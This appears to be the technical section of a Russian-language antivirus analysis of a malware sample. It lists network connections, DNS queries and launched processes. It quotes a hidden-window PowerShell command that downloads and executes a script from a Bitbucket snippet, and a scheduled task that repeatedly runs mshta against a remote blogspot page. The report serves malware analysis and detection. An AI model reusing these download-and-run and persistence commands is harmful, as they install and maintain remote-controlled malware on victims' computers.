Техническая информация
- <SYSTEM32>\tasks\secotaksa
- '<SYSTEM32>\mshta.exe' HTTp://bi##y.com/dasdaasfasfabdjndasljdl
- 'bi##y.com':80
- 'jo###########aabagebarhomeintum.blogspot.com':443
- 'bl##ger.com':443
- 're#####es.blogblog.com':443
- http://bi##y.com/dasdaasfasfabdjndasljdl
- 'jo###########aabagebarhomeintum.blogspot.com':443
- 'bl##ger.com':443
- DNS ASK bi##y.com
- DNS ASK jo###########aabagebarhomeintum.blogspot.com
- DNS ASK bl##ger.com
- DNS ASK re#####es.blogblog.com
- DNS ASK st####.rapidssl.com
- ClassName: 'MS_AutodialMonitor' WindowName: ''
- ClassName: 'MS_WebCheckMonitor' WindowName: ''
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w h i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/san2dadas/B99q6X/57af37e5b19c28bda18e944ec2be98f1d4f728a0/files/blessed') -useB);' (со скрытым окном)
- '<SYSTEM32>\schtasks.exe' /create /sc MINUTE /mo 80 /tn ""SECOTAKSA"" /F /tr ""\""MsHtA""\""http://12###########48@randikhanaekminar.blogspot.com/p/blessednewone1.html\""' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w h i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/san2dadas/B99q6X/57af37e5b19c28bda18e944ec2be98f1d4f728a0/files/blessed') -useB);
- '<SYSTEM32>\schtasks.exe' /create /sc MINUTE /mo 80 /tn ""SECOTAKSA"" /F /tr ""\""MsHtA""\""http://12###########48@randikhanaekminar.blogspot.com/p/blessednewone1.html\""